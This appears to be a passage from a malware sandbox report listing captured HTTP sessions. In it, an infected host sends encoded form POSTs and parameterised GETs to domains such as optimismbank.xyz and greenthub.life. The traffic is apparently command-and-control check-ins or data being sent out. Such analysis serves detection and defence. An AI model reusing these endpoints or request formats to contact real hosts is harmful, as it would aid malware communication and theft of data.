                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 30 32 4f 43 30 59 7a 66 66 53 54 47 49 55 56 42 73 57 4c 33 61 71 63 6b 52 4c 51 4c 59 54 4f 66 30 3d
                                                                            Data Ascii: 2O=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj402OC0YzffSTGIUVBsWL3aqckRLQLYTOf0=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            56192.168.11.204980913.248.169.4880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:55.358460903 CET2578OUTPOST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 30 2f 6b 4f 48 72 41 39 6c 62 6e 35 5a 67 4f 4c 78 38 56 77 34 6a 46 53 31 46 72 61 78 41 67 4b 48 44 36 57 43 63 41 44 65 4d 50 4b 66 56 58 73 4a 6c 37 32 6d 45 58 34 78 71 47 49 72 6b 2f 47 6e 73 53 48 71 35 69 74 4c 71 6d 70 63 58 45 4b 4f 70 73 6c 42 79 43 61 30 72 67 45 6f 75 4a 2b 47 45 68 45 53 33 32 30 5a 4e 30 4c 35 66 50 67 69 6d 4f 77 71 36 4a 50 39 35 49 45 56 4b 66 35 58 52 6c 62 57 38 4c 43 42 43 35 4d 47 6a 56 6e 32 45 41 47 37 6d 4d 56 6e 2f 4c 53 6c 66 6b 64 47 4d 7a 46 4a 49 [TRUNCATED]
                                                                            Data Ascii: 2O=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on0/kOHrA9lbn5ZgOLx8Vw4jFS1FraxAgKHD6WCcADeMPKfVXsJl72mEX4xqGIrk/GnsSHq5itLqmpcXEKOpslByCa0rgEouJ+GEhES320ZN0L5fPgimOwq6JP95IEVKf5XRlbW8LCBC5MGjVn2EAG7mMVn/LSlfkdGMzFJIoB+DdMUHxjAd/IrcZAFkczTrM8wJdx+XKiyhUSs1hVPWbwulxqFx+6gGkijvIkmiqLjr0dq7BW5HCesUrv3ucOspXXZB/3c8r5dyEXJ66hHWD5r81tCaYpDxmjRvo/jznd5QlP3W3WgCkpayzq3lKeLjuufb8kX+Evyfs9DvdZN2E1GrL5AnSSZO1j+a3CxOjy0eI1g3WLflByff25nPKUMckPXwtyC0z+e0l2MlazgFK24mqrKgu4zBJt/20mJR4n4kwf/OAO014VFnHnAygNqsv4mFMLZflHRe5P7ibMZJzVe3TVCMuMCUeWuY66oUSd2/zTuiTj0llxJRwJ7FvofojWrynWoD26bxcSSlZIFOZCtAk6NfZWA8JDC6uDZq1gyMV1JIenMv3tIi1B0yo4dzGVLsDXl4a+zuVBnO0RZw8xnt7XTtFA1N4/ZWRV9GIl0XR4oq6628K/8g3jnC1Ni/CTt4Buvs3rChlMKB6IEV41oWom/ClHe+SF1/jmfMLLYfnzjZ7rK7EGOtBCGyXsHxiUMkPfngf1l5A/EDz3x2egmN+Y7WsIm2DoShSQShSGG9wA242FyiERXmmQHsL93XLtd3ZZZQQpu17HxBLdxJt6JZ5BysBBFVl5b0KgNn3vXGeqgcNQ/5BNVc1f1Ln+q87a+u0UJvgY [TRUNCATED]
                                                                            Dec 3, 2024 18:58:55.358531952 CET5358OUTData Raw: 47 6f 36 57 53 63 70 69 31 75 64 75 37 6e 39 2f 48 45 64 30 70 58 44 75 71 7a 57 66 35 54 50 78 35 71 66 52 78 36 79 51 32 59 4e 79 73 56 32 66 30 4d 45 79 5a 58 44 34 53 6c 43 47 72 6a 4f 71 41 38 70 65 4c 52 63 36 38 45 6d 61 6a 51 47 58 49 54
                                                                            Data Ascii: Go6WScpi1udu7n9/HEd0pXDuqzWf5TPx5qfRx6yQ2YNysV2f0MEyZXD4SlCGrjOqA8peLRc68EmajQGXITwyFrCJxQGLDeZUgXEHQ/wgvb+c/xje99+IsrsNuju/CJobZGoJ7d7JDDnKl/1NoL8GTsvqKy3jgN1vIUI04OUaoe0rx7MNrRD2YDcE/lE3OL2FEFaY42kjetwTeoOjw7QscHXiuLv3HuiIlkLcHm0HmlGrcSKcY92


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            57192.168.11.204981013.248.169.4880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:58:58.047234058 CET490OUTGET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:58.206229925 CET389INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 03 Dec 2024 17:58:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 249
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 4f 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 44 66 76 79 57 6d 68 68 58 34 62 47 41 4a 6a 74 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 6e 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4a 61 71 69 57 61 67 4c 61 51 34 4d 72 70 5a 56 4a 6e 46 34 77 37 77 2f 48 4b 55 32 62 61 4f 64 45 62 34 3d 26 43 68 68 47 36 3d 4a 2d 78 73 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            58192.168.11.2049811209.74.77.10980
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:03.405235052 CET761OUTPOST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 52 59 51 78 33 4e 38 41 77 4f 79 49 61 73 2b 59 38 45 73 4b 5a 48 58 4f 75 4f 55 45 54 35 78 59 41 51 3d 3d
                                                                            Data Ascii: 2O=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
                                                                            Dec 3, 2024 18:59:03.599597931 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:03 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            59192.168.11.2049812209.74.77.10980
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:06.122956038 CET781OUTPOST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 4c 38 71 2b 74 73 52 37 77 44 64 55 2f 6b 71 58 4a 77 47 34 75 68 57 5a 67 6e 53 62 46 53 5a 4a 63 3d
                                                                            Data Ascii: 2O=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
                                                                            Dec 3, 2024 18:59:06.316783905 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:06 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            60192.168.11.2049813209.74.77.10980
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:08.841231108 CET2578OUTPOST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 66 4b 64 52 37 61 41 31 79 63 54 45 6c 6a 30 6c 38 6c 44 52 4a 6f 39 64 55 6e 49 75 6c 4a 71 49 2b 69 51 49 70 30 71 49 72 74 54 45 73 42 69 4b 56 77 76 6c 4b 51 35 6c 4b 41 4a 45 43 78 73 4c 7a 6d 6a 74 75 44 52 31 47 7a 47 53 51 79 74 4d 47 41 56 43 2f 4d 6d 4a 71 4e 67 2f 54 71 6d 32 37 78 4c 70 32 76 62 2f 69 55 62 70 39 34 48 4f 4d 36 31 45 4e 6a 58 36 63 44 71 31 39 53 4b 55 57 2f 65 31 73 6e 54 4c 34 4b 72 62 6a 6a 69 56 41 67 67 44 4a 6c 67 4e 77 6a 2f 79 58 4b 4c 36 71 33 57 73 44 46 [TRUNCATED]
                                                                            Data Ascii: 2O=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8fKdR7aA1ycTElj0l8lDRJo9dUnIulJqI+iQIp0qIrtTEsBiKVwvlKQ5lKAJECxsLzmjtuDR1GzGSQytMGAVC/MmJqNg/Tqm27xLp2vb/iUbp94HOM61ENjX6cDq19SKUW/e1snTL4KrbjjiVAggDJlgNwj/yXKL6q3WsDFrQamS+3A+DqkC+A+4/AueFTbCzRjlbCIkVjYtR11q8SkeW9kFO+JEF2HQFvnjOJNlP/xZw2zAVULmpT0h6b9OAgOLgX/ArMQ2RmtcUun6IYP1YTMJwzxXrbfgFyK6aMbgZxigR6Z3n/ZTKnSKq2T1EWxGJsIZKn2ghnJUewetf0CbHlXByaHPbMYEHxVhcI/qXnc9b8c4XcMwz1gp2Zzn9eI+ZaNFyN6zbEDj3e/CycFr4NuFDHBqMl4MYEggAdeDazDv7h6lmwmId8No7OSr0Bch7jmfTBQDkm6g8gljmByHqN7kVOIGL3QfcnYncIJec+ASSovu3R2CrP33Yzqxcoui/m28lYDAZZZ9TjtrmDprTc3R8ez6JhdelD72gksBTPgFKAn3YY8VUBuBHrdDBKuMBXFeEyHC2m6FGFivrH7dDbFBIwxmiX6o2w5v8pLfn3AkdlBF5BJr7FsYdlnLKDpRjkKvXK84jgMiF6G3xBKfKv69BeYRw8797D7FwcsEzXpyNlfpXaIDJNfAiw1JcNBCSEkcSiVOMJ/rgdTaTLIqaO4wcsL9/OBbw+tBrvHu7KJfD/O4oqAjftwrDH5Zcxo/3nw0tVsQU1PczBggG3Y1oo5TutTA2gvTNAOmlGs25YUA+1NdX0eRkcW35hUbOSGGbp8FoBT/J [TRUNCATED]
                                                                            Dec 3, 2024 18:59:08.841308117 CET5352OUTData Raw: 67 6f 41 4b 4d 32 7a 33 67 79 45 4a 73 52 46 4d 4e 5a 73 6f 46 2f 67 71 52 4d 35 37 70 67 46 54 45 71 48 39 72 47 59 75 65 74 6b 53 38 70 7a 39 4e 55 6e 32 56 50 34 49 4c 33 66 4b 32 68 30 5a 30 34 56 4e 41 46 76 4a 6c 71 48 46 4f 4a 35 56 74 49
                                                                            Data Ascii: goAKM2z3gyEJsRFMNZsoF/gqRM57pgFTEqH9rGYuetkS8pz9NUn2VP4IL3fK2h0Z04VNAFvJlqHFOJ5VtIhh0EMo+NkZvcC/2qmfXjzYdAPuYldOIEDhIbQ9rqh/qoxTyBua+HpLpCxl7LuuOKiGH4z3hU5N6qBtWw9aD/4I4uveTQ9vVEezFAN/cbHmVPzgUIoisj+jJPFJXDd+UXFrnrUkSf+ohbjE1zDsp9BANw4S3VD7b/o
                                                                            Dec 3, 2024 18:59:09.041454077 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:08 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            61192.168.11.2049814209.74.77.10980
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:11.558384895 CET488OUTGET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:59:11.752849102 CET548INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:11 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            62192.168.11.204981523.225.159.4280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:16.949727058 CET6OUTData Raw: 50 4f 53 54
                                                                            Data Ascii: POST
